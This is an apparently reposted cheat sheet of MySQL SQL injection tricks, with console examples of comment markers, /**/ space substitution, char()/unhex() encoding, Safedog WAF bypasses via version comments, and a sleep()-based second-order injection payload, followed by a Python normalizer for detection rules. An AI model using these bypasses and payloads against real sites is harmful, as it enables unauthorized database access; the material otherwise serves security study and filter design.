Things that are easily overlooked and easily gotten wrong
SQL injection tips
=========================================================================
* If single quotes are escaped and the current database uses GBK encoding, consider double-byte (wide-byte) injection.

* Correct use of comment markers: "-- " is the comment marker in MySQL; note the space after it.

  ```
  mysql> select user() from (select 1)x where '1'='1';-- '
  +----------------+
  | user()         |
  +----------------+
  | root@localhost |
  +----------------+
  1 row in set (0.00 sec)
  ```

  The "#" comment works whether or not a space follows it.

  ```
  mysql> select user() from (select 1) x where '1'='1';#'
  +----------------+
  | user()         |
  +----------------+
  | root@localhost |
  +----------------+
  1 row in set (0.00 sec)
  ```

* Use /**/ in place of spaces.

  ```
  mysql> select/**/1;
  +---+
  | 1 |
  +---+
  | 1 |
  +---+
  1 row in set (0.00 sec)
  ```

* Encoding strings in SQL statements

  - With char():

    ```
    mysql> select char(32,47,116,109,112,47,102,95,117,115,101,114,46,116,120,116 );
    +-------------------------------------------------------------------+
    | char(32,47,116,109,112,47,102,95,117,115,101,114,46,116,120,116 ) |
    +-------------------------------------------------------------------+
    |  /tmp/                                                            |
    +-------------------------------------------------------------------+
    1 row in set (0.00 sec)
    ```

  - With concat() of single char() calls:

    ```
    mysql> select concat(char(32),char(47),char(116),char(109),char(112),char(47),char(102),char(95),char(117),char(115),char(101),char(114),char(46),char(116),char(120),char(116) ) ;
    +---------------------------------------------------------------------------------------------------------------------------------------------------------------------+
    | concat(char(32),char(47),char(116),char(109),char(112),char(47),char(102),char(95),char(117),char(115),char(101),char(114),char(46),char(116),char(120),char(116) ) |
    +---------------------------------------------------------------------------------------------------------------------------------------------------------------------+
    |  /tmp/                                                                                                                                                              |
    +---------------------------------------------------------------------------------------------------------------------------------------------------------------------+
    1 row in set (0.00 sec)
    ```

  - UTF-8 via unhex():

    ```
    mysql> select unhex('E6B8B8E5AEA2');
    +-----------------------+
    | unhex('E6B8B8E5AEA2') |
    +-----------------------+
    | 游客                  |
    +-----------------------+
    1 row in set (0.00 sec)
    ```

* Comparison of numbers and strings, similar to weak typing in PHP: a string compared with a number is converted using its leading numeric prefix.

  ```
  mysql> select '10asfasfdeasdfasdf'=10;
  +-------------------------+
  | '10asfasfdeasdfasdf'=10 |
  +-------------------------+
  |                       1 |
  +-------------------------+

  mysql> select '0esfsadf'=0;
  +--------------+
  | '0esfsadf'=0 |
  +--------------+
  |            1 |
  +--------------+
  ```

* Bypassing Safedog (WAF)

  - Regex bypass using version comments and a comment that looks like a line comment:

    ```
    select 1/*!50000union/*!*//*!50000select/*!*/2;
    +---+
    | 1 |
    +---+
    | 1 |
    | 2 |
    +---+

    mysql> select/*/#*/1;
    +---+
    | 1 |
    +---+
    | 1 |
    +---+
    1 row in set (0.00 sec)
    ```

* When several single quotes run together, the two outermost lone quotes pair up to close the string, and the even number of consecutive quotes in between are converted two at a time into one literal quote.

  ```
  mysql> select '123''';
  +------+
  | 123' |
  +------+
  | 123' |
  +------+
  1 row in set (0.00 sec)

  mysql> select '123''''';
  +-------+
  | 123'' |
  +-------+
  | 123'' |
  +-------+

  mysql> select user from mysql.user where user='nickname'' and password=' or sleep(0.1);#'
  Empty set (1.00 sec)
  ```

  This behaviour can lead to "second-order injection". For example, if a user registers with the nickname {nickname'}, it is escaped to {nickname\'} but restored to its original form once inserted into the database; any page that later uses the nickname as a query condition is then open to second-order injection, and setting the other condition field to { or 0=sleep(1);#} is enough to trigger it.
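The comment and quoting rules above are exactly what a keyword-matching filter gets wrong: the pattern it looks for is split by /**/ or /*!50000 */, or sits inside a literal that the filter thinks has already closed. The Python function below, an added example that is not part of the original post, approximates the MySQL lexer so that a detection rule can be applied to the statement the server will actually execute: ordinary comments become whitespace, the body of a version comment is kept as live code, and string literals are skipped over honouring both the '' and \' escapes. It assumes the default sql_mode (backslash escapes on, ANSI_QUOTES off) and that any /*!NNNNN version gate is satisfied; both are assumptions, not something the post states.

```python
import re

def normalize_mysql(sql: str) -> str:
    """Collapse a statement to what the MySQL lexer will actually execute.

    Plain /* */, '-- ' and '#' comments become whitespace; the body of a
    /*!NNNNN ... */ version comment stays as live code; string literals are
    copied verbatim, honouring both '' and \\' escapes. Approximates
    sql/sql_lex.cc; assumes default sql_mode and a satisfied version gate.
    """
    out, i, n = [], 0, len(sql)
    in_version_comment = False
    while i < n:
        c = sql[i]
        if c in "'\"`":                          # quoted literal / identifier
            j = i + 1
            while j < n:
                if sql[j] == "\\" and c != "`" and j + 1 < n:
                    j += 2                       # backslash escape
                elif sql[j] == c and j + 1 < n and sql[j + 1] == c:
                    j += 2                       # doubled quote = one quote
                elif sql[j] == c:
                    j += 1                       # closing quote
                    break
                else:
                    j += 1
            out.append(sql[i:j])
            i = j
        elif sql.startswith("/*!", i):           # version comment opens
            i += re.match(r"/\*!\d*", sql[i:]).end()
            in_version_comment = True
            out.append(" ")
        elif in_version_comment and sql.startswith("*/", i):
            in_version_comment = False           # version comment closes
            i += 2
            out.append(" ")
        elif sql.startswith("/*", i):            # plain comment = whitespace
            end = sql.find("*/", i + 2)
            i = n if end < 0 else end + 2
            out.append(" ")
        elif c == "#" or (sql.startswith("--", i)
                          and (i + 2 >= n or sql[i + 2].isspace())):
            end = sql.find("\n", i)              # line comment to end of line
            i = n if end < 0 else end + 1
            out.append(" ")
        else:
            out.append(c)
            i += 1
    return re.sub(r"\s+", " ", "".join(out)).strip()
```

Run over the Safedog payloads above it yields `select 1 union select 2` and `select 1`, and for the quote-pairing query it shows that ` or sleep(0.1);` lies outside the string literal, which is what a detection rule needs to see.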
Reposted from: .html
Published: 2024-02-01 00:31:34
Article link: https://www.4u4v.net/it/170671869432515.html